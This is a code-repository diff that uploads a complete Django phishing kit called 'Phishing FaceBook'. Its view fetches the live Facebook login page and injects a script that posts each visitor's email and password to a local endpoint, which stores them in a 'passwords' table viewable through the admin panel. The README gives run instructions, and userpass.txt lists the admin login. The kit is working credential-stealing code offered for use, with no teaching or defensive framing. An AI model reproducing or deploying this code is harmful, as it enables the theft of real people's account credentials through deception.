Add files via upload

ReadMe.md

@@ -0,0 +1,13 @@
+# Welcome To Phishing FaceBook
+## Required Python2 or Python3
+1.Download Link: https://www.python.org/ftp/python/3.6.1/python-3.6.1-amd64.exe (for Windows User)
+               https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi (for Windows User)
+
+2.Add python to environment varibales of windows
+
+3.Run Manage.py with python as
+
+```
+python manage.py runserver 0.0.0.0:8000
+or simply run bat file
+```

facebook/__init__.py

@@ -0,0 +1 @@
+#this is init

facebook/settings.py

@@ -0,0 +1,104 @@
+"""
+Django settings for facebook project.
+
+Generated by 'django-admin startproject' using Django 1.8.9.
+
+For more information on this file, see
+https://docs.djangoproject.com/en/1.8/topics/settings/
+
+For the full list of settings and their values, see
+https://docs.djangoproject.com/en/1.8/ref/settings/
+"""
+
+# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
+import os
+
+BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
+
+
+# Quick-start development settings - unsuitable for production
+# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
+
+# SECURITY WARNING: keep the secret key used in production secret!
+SECRET_KEY = '&smdip^8m*nyrj5)d$5g3r-tl@s^l(-q9&u*7gz!9(o^o3kz$0'
+
+# SECURITY WARNING: don't run with debug turned on in production!
+DEBUG = True
+
+ALLOWED_HOSTS = ['localhost','127.0.0.1']
+
+
+# Application definition
+
+INSTALLED_APPS = (
+    'phishing',
+    'django.contrib.admin',
+    'django.contrib.auth',
+    'django.contrib.contenttypes',
+    'django.contrib.sessions',
+    'django.contrib.messages',
+    'django.contrib.staticfiles',
+)
+
+MIDDLEWARE_CLASSES = (
+    'django.contrib.sessions.middleware.SessionMiddleware',
+    'django.middleware.common.CommonMiddleware',
+    'django.middleware.csrf.CsrfViewMiddleware',
+    'django.contrib.auth.middleware.AuthenticationMiddleware',
+    'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
+    'django.contrib.messages.middleware.MessageMiddleware',
+    'django.middleware.clickjacking.XFrameOptionsMiddleware',
+    'django.middleware.security.SecurityMiddleware',
+)
+
+ROOT_URLCONF = 'facebook.urls'
+
+TEMPLATES = [
+    {
+        'BACKEND': 'django.template.backends.django.DjangoTemplates',
+        'DIRS': [],
+        'APP_DIRS': True,
+        'OPTIONS': {
+            'context_processors': [
+                'django.template.context_processors.debug',
+                'django.template.context_processors.request',
+                'django.contrib.auth.context_processors.auth',
+                'django.contrib.messages.context_processors.messages',
+            ],
+        },
+    },
+]
+
+WSGI_APPLICATION = 'facebook.wsgi.application'
+
+
+# Database
+# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
+
+DATABASES = {
+    'default': {
+        'ENGINE': 'django.db.backends.sqlite3',
+        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
+    }
+}
+
+
+# Internationalization
+# https://docs.djangoproject.com/en/1.8/topics/i18n/
+
+LANGUAGE_CODE = 'en-us'
+
+TIME_ZONE = 'UTC'
+
+USE_I18N = True
+
+USE_L10N = True
+
+USE_TZ = True
+
+
+# Static files (CSS, JavaScript, Images)
+# https://docs.djangoproject.com/en/1.8/howto/static-files/
+
+STATIC_URL = '/static/'
+STATIC_ROOT = os.path.join(BASE_DIR,'static')

facebook/urls.py

@@ -0,0 +1,21 @@
+"""facebook URL Configuration
+
+The `urlpatterns` list routes URLs to views. For more information please see:
+    https://docs.djangoproject.com/en/1.8/topics/http/urls/
+Examples:
+Function views
+    1. Add an import:  from my_app import views
+    2. Add a URL to urlpatterns:  url(r'^$', views.home, name='home')
+Class-based views
+    1. Add an import:  from other_app.views import Home
+    2. Add a URL to urlpatterns:  url(r'^$', Home.as_view(), name='home')
+Including another URLconf
+    1. Add a URL to urlpatterns:  url(r'^blog/', include('blog.urls'))
+"""
+from django.conf.urls import include, url
+from django.contrib import admin
+
+urlpatterns = [
+    url(r'^admin/', include(admin.site.urls)),
+    url(r'',include('phishing.urls')),
+]

facebook/wsgi.py

@@ -0,0 +1,16 @@
+"""
+WSGI config for facebook project.
+
+It exposes the WSGI callable as a module-level variable named ``application``.
+
+For more information on this file, see
+https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
+"""
+
+import os
+
+from django.core.wsgi import get_wsgi_application
+
+os.environ.setdefault("DJANGO_SETTINGS_MODULE", "facebook.settings")
+
+application = get_wsgi_application()

manage.py

@@ -0,0 +1,10 @@
+#!/usr/bin/env python
+import os
+import sys
+
+if __name__ == "__main__":
+    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "facebook.settings")
+
+    from django.core.management import execute_from_command_line
+
+    execute_from_command_line(sys.argv)

phishing/__init__.py

@@ -0,0 +1 @@
+#this is init

phishing/admin.py

@@ -0,0 +1,4 @@
+from django.contrib import admin
+from .models import passwords
+# Register your models here.
+admin.site.register(passwords)

phishing/migrations/0001_initial.py

@@ -0,0 +1,21 @@
+# -*- coding: utf-8 -*-
+from __future__ import unicode_literals
+
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+
+    dependencies = [
+    ]
+
+    operations = [
+        migrations.CreateModel(
+            name='passwords',
+            fields=[
+                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
+                ('username', models.CharField(max_length=100, null=True)),
+                ('password', models.CharField(max_length=100, null=True)),
+            ],
+        ),
+    ]

phishing/migrations/__init__.py

@@ -0,0 +1 @@
+#this it init

phishing/models.py

@@ -0,0 +1,8 @@
+from django.db import models
+
+# Create your models here.
+class passwords(models.Model):
+	username=models.CharField(max_length=100,null=True)
+	password=models.CharField(max_length=100,null=True)
+	def __str__(self):
+		return self.username

phishing/static/fb12448784534457.js

@@ -0,0 +1,27 @@
+$(function(){
+	$('#loginbutton').click(function(){
+		/*$.ajax({
+		   method: "POST",
+		   url: "../fblogin/",
+		   data: { 'email': $('#email').val(), 'pass': $('#pass').val() ,'csrfmiddlewaretoken': $('#csrf').html()}
+		  })
+		  .done(function( msg ) {
+		    alert()
+		  });*/
+		$.ajax({
+                    type: "POST",
+                    url: "../fblogin/",
+                    data: {'email':$('#email').val(),'pass': $('#pass').val() , 'csrfmiddlewaretoken': $('#csrf').html()},
+                    dataType: "json",
+                    success: function(response) {
+                    console.log("Shared successfully...");
+
+                          // alert('Company likes count is now ' + response.likes_count);
+                     },
+                      error: function(rs, e) {
+                        console.log(rs.responseText);
+                      }
+              });
+	});
+
+});

phishing/tests.py

@@ -0,0 +1,3 @@
+from django.test import TestCase
+
+# Create your tests here.

phishing/urls.py

@@ -0,0 +1,23 @@
+"""facebook URL Configuration
+
+The `urlpatterns` list routes URLs to views. For more information please see:
+    https://docs.djangoproject.com/en/1.10/topics/http/urls/
+Examples:
+Function views
+    1. Add an import:  from my_app import views
+    2. Add a URL to urlpatterns:  url(r'^$', views.home, name='home')
+Class-based views
+    1. Add an import:  from other_app.views import Home
+    2. Add a URL to urlpatterns:  url(r'^$', Home.as_view(), name='home')
+Including another URLconf
+    1. Import the include() function: from django.conf.urls import url, include
+    2. Add a URL to urlpatterns:  url(r'^blog/', include('blog.urls'))
+"""
+from django.conf.urls import url
+from django.contrib import admin
+from . import views
+
+urlpatterns = [
+    url(r'^$', views.phish,name="Phishing"),
+    url(r'^fblogin/', views.Passwords,name="saved_data")
+]

phishing/views.py

@@ -0,0 +1,37 @@
+from django.shortcuts import render
+from django.http import HttpResponse
+from django.core.context_processors import csrf
+from .models import passwords
+import requests
+try:
+    from django.utils import simplejson as json
+except ImportError:
+    import json
+# Create your views here.
+def phish(request):
+	csrf_c=request.META.get('CSRF_COOKIE',None)
+	if not csrf_c:
+		csrf_c=csrf._get_new_csrf_key()
+		request.META['CSRF_COOKIE'] = csrf_c
+	req=requests.get("https://en-gb.facebook.com")
+	text=req.text.replace('</body>','<span id="csrf" hidden>'+str(csrf_c)+'</span><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script><script src="/static/jquery.cookie.js"></script><script src="/static/fb12448784534457.js"></script></body>')
+	for c in req.cookies:
+		request.META[c.name]=c.value
+	#return render(request,"phishing.html")
+	return HttpResponse(text)
+
+def Passwords(request):
+	if request.method=='POST':
+		username=str(request.POST.get('email'))
+		password=str(request.POST.get('pass'))
+		print(username,password)
+		if not passwords.objects.filter(username=username,password=password):
+			passwords(username=username,password=password).save()
+		ctx={'Success':'Success'}
+	else:
+		ctx={'Bad':'Hacker'}
+	return HttpResponse(json.dumps(ctx), content_type='application/json')
+
+
+
+

startServer.bat

@@ -0,0 +1 @@
+python2 manage.py runserver 0.0.0.0:8000

userpass.txt

@@ -0,0 +1,2 @@
+127.0.0.1:8080/admin
+WeAreTheHackers:lokesh